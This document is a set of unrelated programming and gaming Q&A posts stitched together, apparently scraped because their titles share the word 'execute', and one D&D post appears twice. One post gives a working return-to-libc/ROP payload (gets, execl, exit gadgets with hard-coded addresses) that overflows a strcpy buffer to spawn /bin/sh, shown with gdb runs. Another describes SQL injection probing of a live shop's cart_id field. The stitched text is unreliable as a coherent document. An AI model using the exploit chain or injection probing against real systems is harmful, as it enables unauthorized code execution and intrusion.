ORACLE execute error: ORA-01950: no privileges on tablespace ‘PDATA’

I’m new to Oracle, so maybe my question could be stupid. I use Oracle only for data storage. I have done some research but I’m blocked. I use Oracle 12c. I created a PDB with admin user PEEI_SYS like this:

    create pluggable database PEEI admin user PEEI_SYS identified by PEEI roles = (DBA);
    -- open PDB PEEI
    alter pluggable database PEEI open read write;

I have created another user called PEEI which should only do select, update, insert on tables owned by PEEI_SYS. I have created the user PEEI like this:

    CREATE USER "PEEI" IDENTIFIED BY "PEEI"
      DEFAULT TABLESPACE PDATA
      TEMPORARY TABLESPACE TEMP
      PROFILE DEFAULT
      ACCOUNT UNLOCK;

Now I would like the user PEEI to be able to insert rows in the table PEEI_SYS.PEEI_P_TRACKING. This table is created like this:

    CREATE TABLE PEEI_SYS.PEEI_P_TRACKING (
      "CODE_WORKFLOW" VARCHAR2(30 BYTE),
      "STATUS" VARCHAR2(15 BYTE),
      "DATE_UPDATE" DATE,
      "USER_UPDATE" VARCHAR2(20 BYTE),
      "DEB_WORKFLOW" DATE,
      "FIN_WORKFLOW" DATE,
      "TIME_SECOND" NUMBER
    )
    PCTFREE 10 PCTUSED 40 INITRANS 1 MAXTRANS 255 NOCOMPRESS LOGGING
    STORAGE(INITIAL 65536 NEXT 1048576 MINEXTENTS 1 MAXEXTENTS 2147483645
            PCTINCREASE 0 FREELISTS 1 FREELIST GROUPS 1 BUFFER_POOL DEFAULT)
    TABLESPACE "PDATA";

    GRANT SELECT ON PEEI_SYS.PEEI_P_TRACKING TO ROLE_PEEI_READ;
    GRANT DELETE ON PEEI_SYS.PEEI_P_TRACKING TO ROLE_PEEI_WRITE;
    GRANT INSERT ON PEEI_SYS.PEEI_P_TRACKING TO ROLE_PEEI_WRITE;
    GRANT UPDATE ON PEEI_SYS.PEEI_P_TRACKING TO ROLE_PEEI_WRITE;

When I got the error I granted unlimited privileges to the PEEI user on the PDATA tablespace like this:

    ALTER USER PEEI QUOTA UNLIMITED ON PDATA;

I still have the error. Could you please help me? Thank you very much in advance. Kind regards,

Not authorized on test to execute command

Here is my code:

    mongoose.connect(consts.database, {
        useNewUrlParser: true,
        useUnifiedTopology: true,
        sslCA: consts.databaseCert,
    });
    //...
    const user = await db.userModel.findOne({
        username: usernameLowerCase
    }).exec();

Here is my DB connection string (anonymized):

mongodb://myUser:userPW@SG-staging-111.servers.mongodirector.com:27017,SG-staging-43334.servers.mongodirector.com:27017?replicaSet=RS-staging-0&ssl=true&authSource=stagingDB 

I’m getting this error:

    MongoError: not authorized on test to execute command {
        find: "users",
        filter: {
            username: "bob"
        },
        projection: {},
        limit: 1,
        singleBatch: true,
        batchSize: 1,
        returnKey: false,
        showRecordId: false,
        lsid: {
            id: UUID("0a9400e3-83e3-429c-b8c9-92ade2ff210e")
        },
        $clusterTime: {
            clusterTime: Timestamp(1613200171, 1),
            signature: {
                hash: BinData(0, FED473B580D13E7E5073756DB5140981AADB2985),
                keyId: 6928615819992774977
            }
        },
        $db: "test"
    }

DB user’s info:

myUser  [{"role":"readWrite","db":"stagingDB"}] 

I have no clue why I am getting this error "not authorized on test to execute command", and in the return string $db: "test" I don’t even have a database named test. What could I be doing wrong? I just recently added this new user myUser, but now I’m getting this error. Does this error mean that the user is not authorized to "test" commands? Or, does it mean that I am trying to (somehow) connect with a DB named "test"?

How do I create a query which takes certain time to execute?

I have configured statement_timeout=1000 in Postgres DB

I am accessing a DB table using a JDBC driver from a java application. JDBC driver will throw an exception if the statement times out. I have a logic that will get executed if the exception is thrown.

Now I want to test this functionality. Is there a way to make a query not return the result within 1000 millisecs?

How should I set up and execute air battles in my session to avoid easy encounters?

I’m running the Storm King’s Thunder campaign, and we are at the portion where the PCs get an airship to travel around in, the airship is about 1000ft in the air. There are approximately 5-6 lvl 7 PCs, and they have 3 or 4 hard encounters a day. There are two wizards, a warlock, ranger, paladin, blood hunter, sorcerer, and fighter.

For the most part, they have had fun with the different weapons and enemies they have faced; however, I find that one or two spellcasting PCs have been using spells such as mind sliver, polymorph, and hypnotic pattern to defeat more challenging encounters, such as one with a roc and wyvern. They make the creature make saving throws with hypnotic pattern and cause the enemy to fall to its death, and using mind sliver makes it even harder, especially on low wisdom creatures like rocs. Or with the polymorph spell, they cause the enemy to become a fish or chicken and throw it off the edge, and since the damage carries over, it kills the monster. I realize it was legal and made fights funnier, but it does get annoying when it’s happening in almost every fight. Are there any suggestions on how to keep them on track without them making every encounter easy?

I thought of giving the monsters immunity to these effects, but it sounds like a lame excuse for me not being prepared.

How should I set up and execute air battles in my session to avoid easy encounters? [duplicate]

I’m running the Storm King’s Thunder campaign in dnd 5e, and we are at the portion where the PCs get an airship to travel around in. There are approximately 5-6 lvl 7 PCs, and they have 3 or 4 hard encounters a day. There are two wizards, a warlock, ranger, paladin, blood hunter, sorcerer, and fighter.

For the most part, they have had fun with the different weapons and enemies they have faced; however, I find that one or two spellcasting PCs have been using spells such as mind sliver, polymorph, and hypnotic pattern to defeat more challenging encounters, such as one with a roc and wyvern. They make the creature make saving throws with hypnotic pattern and cause the enemy to fall to its death, and using mind sliver makes it even harder, especially on low wisdom creatures like rocs. Or with the polymorph spell, they cause the enemy to become a fish or chicken and throw it off the edge, and since the damage carries over, it kills the monster. I realize it was legal and made fights funnier, but it does get annoying when it’s happening in almost every fight. Are there any suggestions on how to keep them on track without them making every encounter easy?

I thought of giving the monsters immunity to these effects, but it sounds like a lame excuse for me not being prepared.

ROP execute a shell with execl() – /bin/sh: 0: Can’t open

A C program vulnerable to stack buffer overflow requires 112 bytes of stuffing to get to the return address of the calling function. Here strcpy() is the vulnerable function.

    #include <string.h>

    void f(char *name){
      char buf[100];
      strcpy(buf, name);
    }

    void main(int argc, char *argv[]){
      f(argv[1]);
    }

Trying to write the rop gadgets to execute a /bin/sh shell by means of execl(). The exploit would be:

python -c 'print 112*"\x90" + "addr. execl()" + "addr. exit()" + "addr. /bin/sh" + "addr. /bin/sh"'   

From gdb these are the found addresses (ASLR disabled for test):

    (gdb) print execl
    $1 = 0xb7eb7b60 <__GI_execl>
    (gdb) print exit
    $2 = 0xb7e359e0 <__GI_exit>
    (gdb) info proc map
    ...(output omitted)
    (gdb) find 0xb7e07000,0xb7fbb000,"/bin/sh"
    0xb7f62b0b
    1 pattern found.
    (gdb) x/s 0xb7f62b0b
    0xb7f62b0b:   "/bin/sh"
    (gdb) run $(python -c 'print 112*"\x90" + "\x60\x7b\xeb\xb7" + "\xe0\x59\xe3\xb7" + "\x0b\x2b\xf6\xb7" + "\x0b\x2b\xf6\xb7"')
    Starting program: /home/marco/asm/execve/bypass_aslr/rop/prove/main $(python -c 'print 112*"\x90" + "\x60\x7b\xeb\xb7" + "\xe0\x59\xe3\xb7" + "\x0b\x2b\xf6\xb7" + "\x0b\x2b\xf6\xb7"')
    process 3161 is executing new program: /bin/dash
    /bin/sh: 0: Can't open UWVS��������
    [Inferior 1 (process 3161) exited with code 0177]

The same test using system() gives the shell.

I don’t understand if the execl() is successful and if it’s replacing the currently running process image.

Platform: Ubuntu 16.04 – 32 bit.

UPDATE: I added some gadgets to the exploit, and got back another result. In brief, I added gets() to write the NULL byte as the third argument to pass to execl(). The exploit will write the stack in this order:

    addr. exit()
    fake byte (NULL will be written here)
    addr. /bin/sh
    addr. /bin/sh
    addr. pop\pop\pop\ret
    addr. execl()
    addr. where to write NULL byte
    addr. pop\ret
    addr. gets()        <-- ESP will be here when is time to return to caller
    112 NOP

From gdb I run the exploit, I type "new line" so gets() writes NULL to the provided address, and the result is:

[Inferior 1 (process 2793) exited normally] 

This time no errors, but again no shell.

EDIT2: this is the stack after gets() is executed and before execl().

The commands under gdb I used to take the stack layer:

    (gdb) b 10     --> this is to stop after strcpy() in the .c code
    Breakpoint 1 at 0x8048497: file main.c, line 10.
    (gdb) run $(python -c 'print 112*"\x90" + "\xe0\x83\xe6\xb7" + "\x6e\xd0\xe2\xb7" + "\xf8\xf5\xff\xbf" + "\x80\x9a\xeb\xb7" + "\x4f\x33\xef\xb7" + "\x0b\x4a\xf6\xb7" + "\x0b\x4a\xf6\xb7" + "\x42\x42\x42\x42" + "\xd0\x79\xe3\xb7"')
    Starting program: /home/marco/rop/main $(python -c 'print 112*"\x90" + "\xe0\x83\xe6\xb7" + "\x6e\xd0\xe2\xb7" + "\xf8\xf5\xff\xbf" + "\x80\x9a\xeb\xb7" + "\x4f\x33\xef\xb7" + "\x0b\x4a\xf6\xb7" + "\x0b\x4a\xf6\xb7" + "\x42\x42\x42\x42" + "\xd0\x79\xe3\xb7"')
    Breakpoint 1, func (name=0xb7e2d06e <__ctype_get_mb_cur_max+30> "X3U0327") at main.c:10
    (gdb) b *execl
    Breakpoint 2 at 0xb7eb9a80: file execl.c, line 31.
    (gdb) c
    Continuing.
    Breakpoint 2, __GI_execl (path=0xb7f64a0b "/bin/sh", arg=0xb7f64a0b "/bin/sh") at execl.c:31
    31    execl.c: File o directory non esistente.
    (gdb) x/x $esp
    0xbffff5ec:   0xb7ef334f
    (gdb) x/x $esp+4
    0xbffff5f0:   0xb7f64a0b
    (gdb) x/x $esp+8
    0xbffff5f4:   0xb7f64a0b
    (gdb) x/4x $esp+12
    0xbffff5f8:   0x00    0x42    0x42    0x42
    (gdb) x/s $esp+12
    0xbffff5f8:   ""

Please note, this test was executed from another Ubuntu 16.04, and the addresses are now:

    "\xe0\x83\xe6\xb7" +   -> gets()
    "\x6e\xd0\xe2\xb7" +   -> pop/ret
    "\xf8\xf5\xff\xbf" +   -> address where to write NULL
    "\x80\x9a\xeb\xb7" +   -> execl()
    "\x4f\x33\xef\xb7" +   -> pop/pop/pop/ret
    "\x0b\x4a\xf6\xb7" +   -> addr. /bin/sh
    "\x0b\x4a\xf6\xb7" +   -> addr. /bin/sh
    "\x42\x42\x42\x42" +   -> fake address to be overwritten
    "\xd0\x79\xe3\xb7"     -> exit()

SQL Injection Doesn’t Sanitize But Doesn’t Execute Commands

I am currently doing a pentest on a web application and focusing more on SQL Injection. The company I am pentesting has a functionality in which we are allowed to buy things from the vendors/suppliers registered there. When a product is added to our cart and the ‘Checkout’ button is clicked, the web application will then communicate to the backend to create a cart based on the specified ‘cart_id’ and INSERT it to the database. I know this is the case since when I tried to resubmit the request to the server the following error is specified:

"SQLIntegrityConstraintViolationException: Duplicate entry 'RANDOM_ALPHANUMERIC_CART_ID' for key 'idx_cart_id'" 

I tried checking for SQL Injection by adding a single quote at the end of the ‘cart_id’ and HTTP 200 is returned along with a server response of a new cart_id with the single quote included. Does this mean it is not sanitizing input? I tried inserting other SQL commands; the server will still return 200 and the commands are being printed out on the server response but not being executed. Is this web app vulnerable to SQLi (blind?)? If not, is it possible for me to achieve other vuln such as Stored XSS?

Thank you

Securely execute child process on embedded Linux


Background

I have an embedded Linux device and need to invoke a subprocess. I try to avoid it but sometimes it’s the most practical thing to do, e.g. calling networking commands like ip, networkmanager or doing data processing using a proprietary program.

The simplest thing to do is to call system(3) but then these bad things can happen:

  • Neither program name nor arguments are sanitized.
  • PATH is modified by an attacker, causing the wrong program to be executed.
  • Another environment variable such as IFS is modified by the attacker.
  • If the attacker has been able to gain access to the child program, he may see open files which were not closed
  • And he/she may be able to gain elevated privileges if root privileges were not dropped.

So I probably should not rely on system(3) but write my own fork+exec function; pass the full path to the binary to be executed; make any arguments to the child process hard-coded; sanitize the environment variable; close open files; and drop privileges.

I’ve read the advice given in TAOSSA and John Viega's Secure Programming Cookbook.

My Question

  • Are these steps sufficient?
  • Can someone point to generic implementation of procedures for safely executing subprocesses in C and C++?
  • Do I have to drop capabilities as well?
  • Should I consider running child processes in more isolation? If so, what options are available to me? seccomp filters? Namespace sandboxing?
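
One way to implement the fork+exec steps listed in the question above (absolute path, fixed environment, closed descriptors, dropped privileges), as an added example that is not code from the original post or from the books it cites. The helper name run_child, the /sbin/ip path and the fallback descriptor bound are assumptions.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <grp.h>
#include <stdlib.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment: nothing (PATH, IFS, LD_*) is inherited from the caller. */
static char *const clean_env[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", "IFS= \t\n", NULL };

/* Close every descriptor above stderr so the child sees no leaked files. */
static void close_inherited_fds(void) {
#ifdef SYS_close_range
    if (syscall(SYS_close_range, 3U, ~0U, 0U) == 0) return;
#endif
    long max = sysconf(_SC_OPEN_MAX);
    if (max < 0 || max > 65536) max = 65536;  /* fallback bound: an assumption */
    for (int fd = 3; fd < max; fd++) close(fd);
}

/* Hypothetical helper: run `path` with `argv` as uid/gid.
   Returns the child's exit status, or -1 on error or abnormal exit. */
int run_child(const char *path, char *const argv[], uid_t uid, gid_t gid) {
    if (path == NULL || path[0] != '/') { errno = EINVAL; return -1; }
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        close_inherited_fds();
        if (uid != geteuid() || gid != getegid()) {
            /* Order matters: supplementary groups, then gid, then uid. */
            if (setgroups(0, NULL) != 0 || setgid(gid) != 0 || setuid(uid) != 0) _exit(126);
            if (uid != 0 && setuid(0) == 0) _exit(126);  /* root must be gone for good */
        }
        execve(path, argv, clean_env);  /* no shell, no PATH lookup */
        _exit(127);
    }
    int status;
    while (waitpid(pid, &status, 0) < 0)
        if (errno != EINTR) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Constructed call: /sbin/ip is an assumed install path for ip(8). */
    char *const argv[] = { "ip", "-brief", "addr", NULL };
    return run_child("/sbin/ip", argv, geteuid(), getegid()) == 0 ? 0 : 1;
}
```

This covers only the steps the question lists; capabilities, seccomp filters and namespaces are not handled here.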

SQL Server 2019 UPDATE Statement SET to function does not execute the function again for each row

Here is the scenario. I have a local SQL Server to which I have restored the live SQL Server databases. In order to be GDPR/CCPA compliant, I must anonymize the PII in the local server’s databases. I have a script to do this, and it has been working quite well when the local server is 2008 R2 or 2017. But I just installed 2019 and the same script puts the same value in every row of the table, rather than a different value for each row. It is as though the function is executed only once, then that value is used in the UPDATE statement. Perhaps it is some kind of optimization 2019 is doing? Here is a snippet of the script.

UPDATE Guest SET GuestFirstName=Utility.dbo.RANDWORD() WHERE GuestFirstName IS NOT NULL;

RANDWORD grabs a random word from a table containing approximately 100,000 English words.